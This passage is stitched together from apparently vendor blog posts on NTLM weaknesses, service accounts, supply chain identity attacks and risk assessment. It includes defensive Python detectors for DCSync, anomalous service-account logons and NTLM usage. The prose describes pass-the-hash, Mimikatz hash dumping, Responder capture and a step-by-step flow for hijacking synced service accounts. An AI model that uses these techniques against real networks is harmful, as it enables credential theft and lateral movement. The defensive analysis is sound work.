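    """An operation was performed on an object.
Subject:
\tAccount Name:\t\tDC02$
\tAccount Domain:\t\tCONTOSO
Object:
\tObject Type:\t\tdomainDNS
\tObject Name:\t\tDC=contoso,DC=local
Operation:
\tAccess Mask:\t\t0x100
\tProperties:\t\tControl Access
\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}""",
    """An operation was performed on an object.
Subject:
\tAccount Name:\t\tjsmith
\tAccount Domain:\t\tCONTOSO
Object:
\tObject Type:\t\tdomainDNS
\tObject Name:\t\tDC=contoso,DC=local
Operation:
\tAccess Mask:\t\t0x100
\tProperties:\t\tControl Access
\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}""",
    """An operation was performed on an object.
Subject:
\tAccount Name:\t\tjsmith
\tAccount Domain:\t\tCONTOSO
Object:
\tObject Type:\t\tuser
\tObject Name:\t\tCN=bob,CN=Users,DC=contoso,DC=local
Operation:
\tAccess Mask:\t\t0x100
\tProperties:\t\tControl Access
\t\t{00299570-246d-11d0-a768-00aa006e0529}""",
]

FIELD_RE = re.compile(r"^\s*([A-Za-z ]+?):\s*(.*?)\s*$")
GUID_RE = re.compile(r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})")


def parse_4662(record: str) -> dict:
    """Pull 'Field: value' pairs out of a rendered 4662 event plus every GUID in it."""
    fields = {}
    for line in record.splitlines():
        m = FIELD_RE.match(line)
        if m and m.group(2):  # section headers such as 'Subject:' have no value
            fields.setdefault(m.group(1).strip(), m.group(2))
    fields["guids"] = set(GUID_RE.findall(record.lower()))
    return fields


def detect_dcsync(records, allowed=ALLOWED_REPLICATORS) -> list:
    """Flag replication-right requests on a naming context by non-replicators."""
    findings = []
    for rec in records:
        f = parse_4662(rec)
        rights = {REPL_GUIDS[g] for g in f["guids"] if g in REPL_GUIDS}
        if not rights or f.get("Object Type") != "domainDNS":
            continue  # not a replication request against the domain head
        if f.get("Account Name") in allowed:
            continue  # DCs and the sync account replicate by design
        findings.append({"account": f["Account Name"],
                         "object": f.get("Object Name"),
                         "rights": sorted(rights)})
    return findings


if __name__ == "__main__":
    for hit in detect_dcsync(SAMPLE_4662):
        print(f"possible DCSync: {hit['account']} requested {hit['rights']} on {hit['object']}")
```

The allow-list is what makes this usable: DCs and the directory-sync account must replicate, so the signal is a replication right requested by any other principal. Auditing 4662 for the domain object must be enabled (a SACL on the domain head) or the event never appears, and the same account appearing in a 4662 for a user object, as in the third record, is not a replication request and is correctly ignored.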
This grants unauthorized access to critical business data and services in the cloud. Attackers can move laterally within the cloud environment, compromising additional accounts and accessing sensitive information. If administrative credentials are obtained, they can create backdoors, alter security settings, and maintain persistent access. This highlights the need for MFA, continuous monitoring and adherence to the principle of least privilege.

### Exposing NTLM Vulnerabilities: Initial Access, Lateral Movement, and Threat Exposure

This section delves into the critical phases of exposure: how attackers leverage NTLM weaknesses during the initial access and post-exploitation stages to establish a foothold, escalate privileges, and move laterally, amplifying the potential for widespread network compromise.

Initial access: Attackers often gain initial access through methods such as phishing or exploiting software vulnerabilities. Once inside, they exploit NTLM vulnerabilities to establish a network foothold.

Post-exploitation exposure: After exploitation, NTLM vulnerabilities allow attackers to maintain and expand their access. This can involve further privilege escalation and lateral movement within the network, increasing the damage.

### Malicious Access: Lateral Movement

Lateral movement: With NTLM, an attacker can reuse or replay a hash on other, more privileged machines until they gain domain dominance. Out of the (hacker) box, Kali Linux, onboarded with Metasploit exploits, can be used to accomplish this. For instance, in the 2013 Target data breach, attackers used stolen credentials to move laterally within the network, accessing sensitive systems and customer data. This breach exposed millions of credit card and personal information records, highlighting the dangers of pass-the-hash attacks.
Attackers used captured NTLM hashes to authenticate and move across systems within the network, evading detection and accessing sensitive resources. Another example is the infamous WannaCry ransomware attack, in which attackers used a known vulnerability in the SMB protocol to spread the malware. This included exploiting NTLM authentication weaknesses to move laterally across affected networks, allowing the ransomware to propagate rapidly and cause widespread disruption.

Image: Screenshot of Metasploit running on Kali Linux, showcasing version 4.17.3-dev with details of available exploit, auxiliary, and post-exploitation modules.

### NTLM Threat Exposure Unveiled

The next section delves into the threat exposure posed by NTLM, highlighting how attackers can exploit stored and transmitted hashes, leading to significant security breaches across networks.

#### NTLM Hashes Stored in Memory

The vulnerabilities of NTLM are particularly evident in how it handles and transmits hashes, making it a prime target for attackers seeking to compromise network security through memory extraction, network interception, and pass-the-hash attacks.

NTLM hashes are stored in the memory of authenticated machines. Attackers can use tools such as Mimikatz to extract these hashes from memory, allowing them to impersonate users without needing their actual passwords. Once attackers have extracted the NTLM hashes, they can perform a pass-the-hash attack: using the hash to authenticate against other systems in the network, effectively gaining the same access as the original user. This can lead to a large-scale compromise of the network if higher-privileged accounts are targeted.

#### NTLM Hashes Sent Over the Network

NTLM authentication sends hashes over the network, making them susceptible to interception. Using network sniffing tools, attackers can capture these hashes and perform man-in-the-middle attacks to gain access to them.
If attackers successfully intercept these hashes, they can use them to escalate their privileges by authenticating to additional machines and using tools such as LSADUMP to extract further credentials.

#### NTLM Requires Multiple Authentications Compared to Kerberos

NTLM authentication: Each time a user accesses a different resource, NTLM sends the hashed credentials over the network. This repeated transmission of hashes gives attackers more opportunities to intercept and misuse them. Because hashes are stored on each machine, they are dispersed throughout the network by design.

Imagine a user named Alice who needs to access multiple network resources, such as a file server, an email server, and a printer. For each access request, Alice's workstation sends her hashed credentials over the network to the respective server. An attacker using a network sniffing tool can intercept these hashes during transmission. With enough intercepted hashes, the attacker can perform a pass-the-hash attack to gain unauthorized access to other systems by replaying the captured hashes.

Kerberos authentication: Kerberos, in contrast, uses a ticket-based authentication mechanism that minimizes repeated authentication requests and significantly reduces the risk of credential interception. In Kerberos, the user authenticates once to the Key Distribution Center (KDC) and receives a Ticket Granting Ticket (TGT). This TGT is then used to request service tickets for accessing different resources without resending the user's credentials over the network.

### Combating NTLM Attacks: Common Strategies and Proactive Measures

The following section examines techniques related to credential access, beginning with dumping the hashes stored in memory. When a user logs in or authenticates to a service, their credentials are hashed, and these hashes are stored in the system's memory. Attackers frequently use tools such as Mimikatz to extract NTLM hashes from a machine's memory.
Once obtained, these hashes can be leveraged in pass-the-hash attacks to gain unauthorized access to other systems within the network. Attackers typically begin by compromising a system with sufficient privileges to access the memory of the Local Security Authority Subsystem Service (LSASS), where NTLM hashes are stored.

Figure: Example of extracted NTLM and SHA1 hashes using Mimikatz. The image displays information about an interactive user session, including the authentication details for a user named "alice" on the CONTOSO domain. It shows her NTLM and SHA1 hashes, which could potentially be used in a relay attack or password cracking attempt.

#### From Network Traffic: Responder

In a network where NTLM authentication is used, tools like Responder pose a significant threat because they can capture...

---

- Published: 2024-08-01
- Modified: 2024-09-30
- URL: https://www.silverfort.com/blog/shining-the-spotlight-on-the-rising-risks-of-non-human-identities/

### Active Directory Service Accounts: A Closer Look at One of the Most Common NHIs and Their Role in Lateral Movement

The security of Non-Human Identities (NHIs) is now top of mind for security stakeholders. But what exactly is a non-human identity, and how does it impact an organization's cybersecurity posture? NHI is a broad term used to describe when a machine, application, or service is given credentials to perform an automated task or action. There are many types of NHIs, including API keys, service accounts, system accounts and OAuth tokens, among others. Let's say IT manager Bob writes a script asking a machine to perform a daily backup to a server. Bob is giving the machine credentials and access to perform the automated backup. This is an NHI. In today's research, we're going to zero in on the most prevalent and regularly compromised type of NHI: Active Directory service accounts.
Within the large pool of NHI types, service accounts, used for machine-to-machine communication within Microsoft Active Directory (AD) environments, are the most concerning. These identities are just as vulnerable to compromise and abuse as human ones. In fact, due to a historic lack of visibility and protection, they may be at even greater risk. Typically, they have privileged access to sensitive machines, effectively making them admin accounts.

We've uncovered data from the past 12 months that helps us answer these questions. In our research, we unpack the scope of AD service accounts, their exposure to compromise, and the confidence of identity security teams in their ability to discover and protect them.

### Why NHIs (AD Service Accounts) Are an Attacker's Best Friend

By default, attackers target service accounts for lateral movement because of their high access privileges, low visibility, and protection challenges. In many cases, service accounts fly under the radar of security and identity teams because those teams don't even know they exist. Using the same example as above, when IT manager Bob automates the backup of a server and then leaves the company, that automated machine-to-machine task continues unseen and unmonitored. The service account still has access to both the server and the backup server, making it an enticing target for a bad actor.

The risks associated with a breached service account are immense because it can lead to the compromise of the organization's entire SaaS environment, too. Even though service accounts are not supposed to be synced from AD to the cloud identity provider (IdP), it's extremely common for identity teams to sync them inadvertently. While these accounts can't be used to access SaaS resources by default, an attacker who has gained admin privileges on the cloud IdP can activate them and assign them access privileges.
Sample attack flow:

1. The attacker gains admin access privileges to the cloud IdP management console.
2. Once inside, the attacker searches for synced service accounts (naming conventions are a useful guide) until finding one.
3. The attacker configures an access policy for the chosen service account and assigns it access privileges to SaaS apps.
4. The attacker then uses the service account to access and act within the SaaS environment.

### The Sheer Volume of AD Service Accounts Is Alarming

#### Service accounts make up a large portion of total users within a company's AD

On average, around one-third of users within AD are service accounts. The ratio of service accounts to total identities is smaller in larger companies, but that doesn't mean they have fewer service accounts in absolute terms. To put this into context, a large enterprise with 100,000 users in AD would likely have approximately 23,000 active service accounts. In smaller organizations, nearly half of all AD users are service accounts with high privileges and access.

### Service Accounts' Exposure to Compromise

#### Weak authentication protocols make service accounts vulnerable

NTLM still exists in many Windows domains despite being a very weak authentication protocol that's susceptible to credential access and lateral movement. In fact, 46% of service accounts regularly authenticate via this deprecated protocol, leaving them more exposed to compromise.

### Visibility into Service Accounts Is Murky at Best

#### Teams aren't so sure they have an accurate inventory of service accounts

Complete visibility into all your human and non-human identities is fundamental to good identity security. Yet a recent whitepaper by Osterman Research revealed that only 5.7% of organizations have full visibility into their service accounts, while 62% have only partial visibility.
Most NHIs, including service accounts, cannot be protected with MFA, and the lack of visibility into their activities rules out protecting them in a Privileged Access Management (PAM) vault with password rotation.

### Confidence in Protecting Service Accounts Is Minimal

#### Protection of service accounts is a serious challenge for organizations

Only 1 in 5 organizations are highly confident that they can prevent adversaries from using a service account for malicious access. This leaves 80% of organizations unable to prevent the misuse of service accounts in real time due to sporadic or absent visibility and security.

#### Lateral movement continues to be a thorn in the defender's side

Moving laterally through an organization is table stakes for an attacker, and service accounts are one of their top targets for doing so. Alarmingly, only 22.4% of organizations are confident they can stop lateral movement with compromised credentials in their environments.

### Looking Ahead: NHIs Present a Challenge, But There Are Solutions

NHIs make up a significant portion of an organization's total identities. The volume of NHIs will continue to climb as we accelerate the pace of automation, innovation, and the great amplifier, artificial intelligence. Today we analyzed a single type of NHI used at the typical organization, but it's not hard to imagine a slew of similar results if we expanded our scope and applied the analysis to other types of NHIs regularly used at organizations globally. The compromise of a single NHI service account could give attackers access to multiple resources, making it an ideal target for attackers, sophisticated or not. And they'll rarely face much resistance, as standard security controls such as traditional MFA can typically only protect human identities. Coupled with the fact that only one in five organizations is highly confident in preventing identity threats, this paints an alarming picture.

### Steps to Protecting Your Non-Human Identities

1. Strive for least privilege: Limit access at the most granular level, especially on privileged non-human accounts, based on source, destination, protocol, time, and other factors. Excessive privileges can lead to unintentional risks in an organization, such as data loss or theft, and create more, unnecessary targets for phishing attacks.
2. Define your "normal": To establish what constitutes a risk, or abnormal activity in a network, clearly establish a baseline of what "normal" behavior looks like for all identities, both human and non-human. This should be particularly easy for service accounts, whose behavior is highly predictable and repetitive, assuming, of course, that you already have visibility into your NHIs.
3. Quickly spot abnormal activity: With the right tools in place to proactively monitor and alert them to abnormal activity, teams can respond quickly. This helps identify and prevent further deviations, and if attackers are trying to break into the network, the security team can efficiently mitigate and contain the scope of the attack.
4. Automatically block atypical service accounts' access attempts: Detection is not enough. You should also be able to actively block a suspected compromised service account from accessing the targeted resource.
5. Seek out a tool that extends MFA beyond human identities: MFA is a tried and tested security control that has proven time and again to thwart attackers. By extending MFA to resources that were once unprotectable, you finally get a "double check" on every authentication request, even for NHIs.

Learn more about how Silverfort can help protect your NHIs.

### Report Methodology

In Silverfort's Identity Underground Report, we looked at hundreds of thousands of data points across hundreds of customers of different sizes and verticals to determine the scope of the non-human identity problem, with a focus on highly privileged and pervasive Active Directory service accounts.
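Steps 2 to 4 above (baseline, detect, block) are mechanical for a service account precisely because its behaviour is repetitive: the same source host, the same destinations, the same logon type, the same hours. The following is an added example written for this post, not Silverfort's product logic, of what that baseline-and-decide loop looks like over authentication records; the account name svc_backup, the host names and the logon history are constructed, and the field set (source, destination, protocol, logon type, hour) mirrors the factors step 1 names.

```python
from collections import defaultdict

FIELDS = ("src", "dst", "protocol", "logon_type", "hour")

# Constructed history of a backup service account: (account, source host,
# destination, protocol, Windows logon type, hour of day). Logon type 3 is a
# network logon, 2 interactive, 10 remote interactive (RDP).
HISTORY = [
    ("svc_backup", "BKP01", "FS01", "Kerberos", 3, 2),
    ("svc_backup", "BKP01", "FS01", "Kerberos", 3, 2),
    ("svc_backup", "BKP01", "FS02", "Kerberos", 3, 2),
    ("svc_backup", "BKP01", "FS02", "Kerberos", 3, 3),
]


def build_baseline(history) -> dict:
    """Step 2: per account, the set of values ever seen for each field."""
    baseline = defaultdict(lambda: {f: set() for f in FIELDS})
    for account, *values in history:
        for field, value in zip(FIELDS, values):
            baseline[account][field].add(value)
    return baseline


def assess(baseline: dict, event: tuple):
    """Steps 3 and 4: return (decision, reasons). Structural deviations (new
    source, new destination, new logon type) block; protocol or time-of-day
    deviations alone only alert, to keep a late or re-scheduled job running."""
    account, src, dst, protocol, logon_type, hour = event
    if account not in baseline:
        return "alert", ["no baseline for account (visibility gap)"]
    b = baseline[account]
    hard, soft = [], []
    if src not in b["src"]:
        hard.append(f"new source host {src}")
    if dst not in b["dst"]:
        hard.append(f"new destination {dst}")
    if logon_type not in b["logon_type"]:
        hard.append(f"unusual logon type {logon_type}")
    if protocol not in b["protocol"]:
        soft.append(f"unusual protocol {protocol}")
    if hour not in b["hour"]:
        soft.append(f"outside usual hours ({hour:02d}:00)")
    if hard:
        return "block", hard + soft
    if soft:
        return "alert", soft
    return "allow", []


def demo() -> dict:
    """Evaluate a few constructed new events against the baseline."""
    baseline = build_baseline(HISTORY)
    events = {
        "routine_backup": ("svc_backup", "BKP01", "FS01", "Kerberos", 3, 2),
        "late_backup": ("svc_backup", "BKP01", "FS02", "Kerberos", 3, 5),
        "rdp_from_workstation": ("svc_backup", "WS-ALICE", "FS01", "NTLM", 10, 14),
        "backup_account_hits_dc": ("svc_backup", "BKP01", "DC01", "NTLM", 3, 2),
        "never_seen_account": ("svc_legacy", "APP07", "SQL01", "NTLM", 3, 9),
    }
    return {name: assess(baseline, ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, (decision, reasons) in demo().items():
        print(f"{name:24s} {decision:6s} {'; '.join(reasons)}")
```

The split between hard and soft deviations is the design choice worth copying: a service account appearing on a workstation with an interactive logon, or reaching a domain controller it has never touched, is the lateral-movement pattern the post describes and is safe to block outright, whereas a new hour or protocol alone is worth an alert and a look, not an outage. An account with no baseline at all is the inventory problem from the visibility section, surfaced as a finding rather than silently allowed.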
We also conducted research with Osterman Research, which included responses from 637 people in identity roles during May-June 2023. To qualify, respondents had to work at organizations with at least 1,000 employees. The surveys were conducted in six countries, with the surveys in France and Germany fielded in French and German respectively. The survey was cross-industry, and no industries were excluded or restricted.

---

- Published: 2024-07-30
- Modified: 2024-07-30
- URL: https://www.silverfort.com/blog/ntlm-deprecation-is-giving-us-xp-eol-flashbacks-are-you-protected/

Microsoft recently announced the deprecation of the NTLM protocol for Windows clients. This is in line with Microsoft's encouragement to move away from NTLM because of the security risks it introduces, and it acts as a wake-up call that continued NTLM usage puts environments at high risk. We cannot overlook the striking resemblance between today's NTLM deprecation and Windows XP's EOL a decade ago. In both cases, Microsoft ceased to support a legacy, yet extremely common, piece of infrastructure that exposes its users to critical risks. In the case of XP, the risk was malicious remote code execution; with NTLM it's credential access and the subsequent lateral movement and ransomware spread. This blog provides a summary of the potential identity threats NTLM introduces to organizations today and outlines a mitigation plan to ensure your environment remains resilient.

### Did You Know NTLM Is Alive and Kicking?

While NTLM being 'insecure' is common knowledge, it is still heavily used in production environments.
The Identity Underground Report, published in March 2024, disclosed that an alarming proportion of users, admins and service accounts still use NTLM for resource access:

- 64% of user accounts regularly use NTLM for resource access. (Diagram #1: Breakdown of NTLM authentications by percentage of users)
- 37% of administrator users regularly use NTLM for resource access. (Diagram #2: Additional breakdown focusing on admin and non-admin users)
- 46% of service accounts regularly use NTLM for resource access. (Diagram #3: Breakdown of NTLM authentications by percentage of service accounts)

### Did You Know NTLM Can Enable Mass Ransomware Spread?

But what is the actual risk of high NTLM usage? NTLM's security issues stem from the way it uses hashes instead of passwords. This avoids sending the cleartext password over the wire, which is good. However, attackers can abuse this mechanism and use the NTLM hash itself as a password equivalent for malicious resource access. Let's map this NTLM abuse to MITRE ATT&CK framework terminology:

- Credential access: attackers can employ a wide array of available tools to extract the NTLM hash, either from its storage in machines' memory or while it traverses the network between machines.
- Lateral movement: following the hash compromise, attackers can either use the hash itself or crack it offline to obtain the cleartext password. In the former case, they use techniques such as Pass-the-Hash or NTLM relay. In the latter, they simply use the newly obtained passwords for malicious access.

The combination of credential access and lateral movement is the X-factor behind all the high-profile ransomware attacks organizations have experienced in recent years.
### Knowledge Is Power: Ask the Following Questions to Understand and Resolve Your NTLM Risk Exposure

Gain insight into your environment's NTLM exposure and mitigation capabilities by asking your identity security team the following questions:

#### Do we have visibility into actual NTLM usage in our environment?

This question focuses on the scope of your NTLM exposure across all users, admins, service accounts, and the resources where NTLM is used. The answer should be quantified as a percentage, like the ones we've shown above.

#### Can we limit NTLM usage to where it is absolutely necessary?

The next step is to see what you can do to minimize NTLM usage. The answer to this question should show the portion of your NTLM usage that cannot be eliminated (legacy apps are the most common example) and the portion that could be removed without any operational disruption.

#### Can we block lateral movement facilitated by NTLM in real time?

Here we should assume a breach has already happened. If NTLM is in place, there's a solid chance that attackers will compromise passwords and attempt malicious access. The answer to this question should list the security controls in place that can detect and block malicious access attempts using NTLM-related compromised credentials.

### Conclusion: See, Know and Act to Mitigate NTLM Risks

As with Windows XP, being proactive is the best approach to mitigating NTLM-driven risks. The three questions above outline a proactive mitigation strategy, so can your identity and security teams provide solid answers to them? Of course, this depends on the identity and security solutions you have in place. If you can't find the answers, or if they're unsatisfying, immediate action is required to find a solution that can help. Anything short of that would leave you exposed. Remember XP and the multiple attacks organizations experienced on a daily basis? That problem didn't vanish by itself. NTLM will be no different.
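The first question asks for NTLM usage as a percentage of accounts per class, the same shape as the three figures above. The domain controllers already record what is needed: every successful logon is a Security event 4624 whose "Authentication Package" says Kerberos or NTLM and whose "Package Name (NTLM only)" distinguishes NTLM V1, NTLM V2 and LM. The following is an added example, not the Identity Underground Report's method or Silverfort's code, that turns such records into the per-class figures; the 4624 extracts, the admin list and the "svc_" naming rule for service accounts are constructed for the demo, and computer accounts and ANONYMOUS LOGON are excluded so they do not inflate the counts.

```python
from collections import defaultdict

# Constructed extracts of Security event 4624:
# (Account Name, Authentication Package, "Package Name (NTLM only)").
SAMPLE_4624 = [
    ("alice", "Kerberos", "-"),
    ("alice", "NTLM", "NTLM V2"),
    ("bob", "Kerberos", "-"),
    ("carol", "NTLM", "NTLM V1"),
    ("dave", "Kerberos", "-"),
    ("adm_eve", "Kerberos", "-"),
    ("adm_eve", "NTLM", "NTLM V2"),
    ("adm_frank", "Kerberos", "-"),
    ("svc_backup", "NTLM", "NTLM V2"),
    ("svc_sql", "Kerberos", "-"),
    ("svc_old", "NTLM", "NTLM V1"),
    ("WS01$", "Kerberos", "-"),               # computer account: excluded
    ("ANONYMOUS LOGON", "NTLM", "NTLM V1"),   # null session: excluded
]

# Hypothetical admin list; in practice derive it from the privileged groups.
ADMINS = {"adm_eve", "adm_frank"}


def classify(account: str, admins=ADMINS):
    """Bucket an account as 'user', 'admin' or 'service', or None to skip it."""
    if account.endswith("$") or account.upper() == "ANONYMOUS LOGON":
        return None
    if account in admins:
        return "admin"
    if account.lower().startswith("svc_"):   # constructed naming convention
        return "service"
    return "user"


def ntlm_exposure(records=SAMPLE_4624, admins=ADMINS) -> dict:
    """Per class: distinct accounts seen, how many used NTLM at all, the
    percentage, and how many used NTLMv1 or LM (the weakest variants)."""
    seen, ntlm, weak = defaultdict(set), defaultdict(set), defaultdict(set)
    for account, auth_pkg, lm_pkg in records:
        cls = classify(account, admins)
        if cls is None:
            continue
        seen[cls].add(account)
        if auth_pkg.upper() == "NTLM":
            ntlm[cls].add(account)
            if lm_pkg.upper() in ("NTLM V1", "LM"):
                weak[cls].add(account)
    report = {}
    for cls in ("user", "admin", "service"):
        total = len(seen[cls])
        report[cls] = {
            "accounts": total,
            "ntlm_accounts": len(ntlm[cls]),
            "ntlm_pct": round(100.0 * len(ntlm[cls]) / total, 1) if total else 0.0,
            "ntlmv1_accounts": len(weak[cls]),
        }
    return report


if __name__ == "__main__":
    for cls, row in ntlm_exposure().items():
        print(f"{cls:8s} {row['ntlm_pct']:5.1f}% of {row['accounts']} accounts use NTLM "
              f"({row['ntlmv1_accounts']} on NTLMv1/LM)")
```

Counting distinct accounts rather than events is deliberate: one chatty legacy application can generate thousands of NTLM logons from a single account, and the question is how many identities are exposed, not how often. Keeping the NTLMv1/LM count separate feeds the second question, since those accounts and the resources they hit are the first candidates for elimination.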
---

- Published: 2024-07-23
- Modified: 2024-10-15
- URL: https://www.silverfort.com/blog/identity-security-is-the-key-to-managing-manufacturers-supply-chain-cyber-risk/

What's the weakest link in a manufacturer's security architecture? One common answer is 'the one you can't control', with third-party access being the most prominent example. Supply chain attacks are one of the hardest challenges security teams struggle with, particularly for manufacturing companies that rely heavily on an ecosystem of external contractors. Their access is crucial for business operations, yet it is almost completely beyond the control of the identity security team.

In this blog we'll analyze this challenge in detail and shed light on the only spot where security can be enforced: authentication and access. We'll then show how Silverfort's Unified Identity Security platform can leverage various controls, such as ITDR, MFA, and the authentication firewall, to mitigate supply chain risk and ensure third-party access never compromises the organization's security posture.

### Supply Chain 101: How to Secure What You Don't Own

The logic behind supply chain attacks is simple. Sometimes the actual target is just too strong. Instead of wasting time and effort attacking it directly, adversaries focus on a third party that is trusted by the target organization. Usually this third party is less resilient to attack than the main target; otherwise there would be no benefit in going after it in the first place. So here is the problem in its most distilled form: by definition, there will always be a third party that is easier to compromise than your own company. Sooner or later, attackers will discover this potential route into your environment. However, your hands are tied: you have no say over this third party's security posture, and you can't enforce your internal security controls and practices on an environment that is not yours.
### Supply Chain Attacks Are the Ultimate Sweet Spot for Identity Threats

There are various forms of supply chain attacks, but we'll focus on the ones that involve the identity theft of a trusted third-party contractor or vendor. As previously explained, it is easier for the adversary to compromise the third party's credentials than to attack your environment directly. And this compromise yields a tremendous return, as it provides the adversary with full access without needing any malicious code, weaponized emails, or phishing.

### Manufacturers Beware: You Are Highly Exposed to Supply Chain Attacks

Manufacturing companies are a natural target for supply chain attacks. The nature of their business entails an extensive supply chain, from inbound raw materials to outbound finished goods, with numerous software vendors providing continuous support to shop floor, logistics, finance and business operations. This further complicates the problem: the more third-party entities there are, the greater the chance an attacker will find one that is easily compromised. It could literally be anyone: a small supplier of raw materials, a warehousing software vendor, or a retailer that buys the manufactured product.

### What Would a Typical Supply Chain Identity Attack Look Like?

Let's take a closer look at the supply chain attack flow.

#### Part #1: Identify and compromise a vulnerable supply chain member

Adversaries can easily perform the reconnaissance required to get a clear picture of their target's supply chain ecosystem. Once the mapping is done, several potential targets are picked based on their estimated resilience to compromise and their potential access privileges. Gaining initial access to these supply chain members typically follows the standard social engineering/weaponized email/remote code execution flow, enabling attackers to obtain a username and password for remote access to the targeted manufacturer.
#### Part #2: Leverage the compromised third-party identity for malicious access

Once credentials are obtained, the attackers can connect to the manufacturer's environment just as the legitimate supply chain member would. It's important to note that this malicious access doesn't involve any malware or installation of a backdoor. It simply abuses a legitimate access path, making it extremely hard for the security controls in place to detect that something is wrong.

#### Part #3: Execute the attack's objective

After access is gained, the adversary follows up by executing their initial objective: ransomware, data theft, etc. In most cases they would perform additional lateral movement within the manufacturer's environment.

### Protection 101: Place Your Defenses at the First Point You Can Control

The main reason for supply chain risk is that you have zero control over the resilience of your external contractors' environments. The pragmatic, and realistic, assumption should be that this cannot be changed. It naturally follows that you should set your protection measures at the first line of defense that you do control: the authentication stage. This is the first place where the third party (or the attacker that has compromised it) interacts with your environment, and ideally this is where you'd want security controls that can detect and block malicious access with compromised credentials.

### Silverfort Unified Identity Security Platform: Defense-in-Depth Against Supply Chain Attacks

Silverfort provides the first Unified Identity Security platform purpose-built to detect and prevent malicious access with compromised credentials by any user to any resource, both on-prem and in the cloud. Silverfort's platform integrates with the identity infrastructure already in place, offering real-time visibility, risk analysis, and active enforcement over every authentication and access attempt.
This technology fuels several identity security modules that operate together to fully mitigate supply chain malicious access risks:

#### Multi-Factor Authentication: Enforce MFA on any third-party access without agents or proxies

With Silverfort, you can easily apply MFA protection across your entire supply chain ecosystem, significantly reducing the likelihood of malicious access with compromised credentials. This protection applies to the initial access to the manufacturer's environment, as well as access to any subsequent resources within it.

#### Authentication Firewall: Reduce the supply chain attack surface with least privilege access policies

Silverfort's Authentication Firewall enables identity security teams to easily segment their environments based on users' identities. In doing so, third-party contractors can access the resources they need while being unable to access any other resource. This additional security layer significantly reduces the potential blast radius of a successful malicious access. Additionally, if a breach is discovered, identity teams can apply a break-glass procedure by blocking all access to resources in a single click.

#### Identity Threat Detection and Response (ITDR): Defense-in-depth against malicious access scenarios

Silverfort's risk engine continuously analyzes every authentication and access attempt to detect any indication of credential access, privilege escalation or lateral movement. The risk engine can identify a multitude of malicious techniques, such as Pass-the-Hash and Kerberoasting, as well as access anomalies that indicate a compromise. This acts as an additional defense layer, so even if an attacker does manage to access the targeted environment, Silverfort ITDR will reveal their presence. Silverfort ITDR goes far beyond detection and alerting, and can trigger either MFA or the Authentication Firewall to proactively block any malicious access.

### Are You a Manufacturer? Gaining the Upper Hand Against Supply Chain Attacks Is Within Your Reach

Identity security is now more urgent than ever. Compromised credentials are the leading attack vector today, and they play a critical role in any supply chain attack. Regain control over your environment by putting the required identity security layers in place today. Want to learn more? Reach out to one of our experts to schedule a call.

---

- Published: 2024-07-18
- Modified: 2024-07-18
- URL: https://www.silverfort.com/blog/knowledge-is-power-the-importance-of-identity-risk-assessment/

Over 80% of organizations have experienced an identity-related breach that involved compromised credentials. Compromised credentials are one of the most sought-after weaknesses for attackers to facilitate identity breaches, such as lateral movement and ransomware spread. To determine and resolve their identity weaknesses and exposures, organizations need to conduct an identity risk assessment. In this article, we will examine the key components of an effective identity risk assessment and discuss how to gain full visibility and insight into your identity security posture with Silverfort.

### Identity Risks Start with Identity Weaknesses

Organizations are struggling with identity threats such as account takeovers, lateral movement and ransomware. According to a recent report by Silverfort and Osterman Research, over 80% of organizations have experienced an identity-related breach that involved compromised credentials, with more than half of these breaches occurring in the past year alone. The continued success of these attacks implies that there are weak links or security gaps that attackers target to compromise credentials, escalate privileges and move laterally. The purpose of an identity risk assessment is to uncover these gaps.
For example, a recent report entitled “The Identity Underground” disclosed the most critical and prevalent of these weak links and unveiled some alarming findings, including:

- Insecure on-prem password sync is a contributing factor to the compromise of SaaS apps in 67% of organizations.
- 37% of admins use NTLM to authenticate, and a further 7% use NTLMv1.
- 31% of all users in an organization are service accounts.
- 7% of regular users have admin-level access privileges without belonging to any admin groups.

The above data is only a small sample that illustrates the magnitude of the identity threat exposure challenge.

### Key Elements of Identity Risk Assessment

Organizations undertake security risk assessments to gain insights into their weaknesses and exposures. The process of conducting a risk assessment involves the collection and analysis of data. Specifically, this article focuses on identity-related data, such as accounts, authentications, and access privileges. An identity risk assessment typically includes the following components:

#### Identity-Related Data

User Account Inventory: Full visibility into all user accounts, service accounts, and admin accounts. A detailed inventory will typically include information such as names, descriptions, group memberships, and the applications associated with each item.

Configurations: A comprehensive overview of both on-prem and cloud-based configurations of users and directories.

Access Patterns: Full visibility into all authentications and access patterns of active users and resources, both on-prem and in the cloud, including service accounts and authentication logs.

#### Risk Analysis

Credential Access: The MITRE ATT&CK framework defines credential access as the techniques attackers use to steal credentials such as account names and passwords. Credential access techniques include keylogging, credential dumping, and brute force, among others.
Newer authentication protocols are designed to prevent such attacks, but older protocols like NTLMv1 use weak encryption that can easily be brute-forced. The identity risk assessment aims to discover the weaknesses that enable attackers to use credential access techniques.

Privilege Escalation: As outlined in MITRE ATT&CK, privilege escalation consists of techniques attackers use to gain higher-level permissions on a system or network. Even after they have gained initial access to the organization's environment, attackers may still need higher privileges in order to carry out their attack. For this reason, privileged accounts are frequently targeted. Attackers will commonly attempt to take advantage of system weaknesses and misconfigurations; for example, shadow admins, who are regular users that were unknowingly given admin privileges or configuration/reset privileges over admin accounts. Shadow admins can reset the passwords of actual admins, but they are regular users in all other respects. Their anonymity also means they are not subject to the same security controls.

Lateral Movement: Lateral movement, as defined in the MITRE framework, comprises the techniques attackers use to enter and control remote systems. This way, attackers can enter the environment and move undetected from one point to the next until they reach their target. For this reason, attackers are very interested in accounts that lack visibility and protection from existing security solutions. Service accounts, for instance, are difficult to keep track of, are often highly privileged, and cannot be protected by password rotation, which means they can be exploited for lateral movement.

Security Coverage Gaps: There are accounts and resources that security controls cannot cover, and certain weaknesses that cannot be eliminated. For example, many organizations still use legacy systems which do not natively support MFA.
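The risk-analysis checks described above (shadow admins holding reset rights over admins without admin group membership, privileged accounts still authenticating over NTLM or NTLMv1, and service accounts used interactively), run over a constructed inventory and authentication log. This is an added example, not Silverfort's code; the inventory schema, the `can_reset` relation and every account and host name are assumptions made for the example.

```python
"""Identity risk assessment over a constructed account inventory and auth log.

Added example, not Silverfort code. The inventory, the log lines and their
layout (user,proto,logon_type,src,dst) are constructed; "can_reset" stands in
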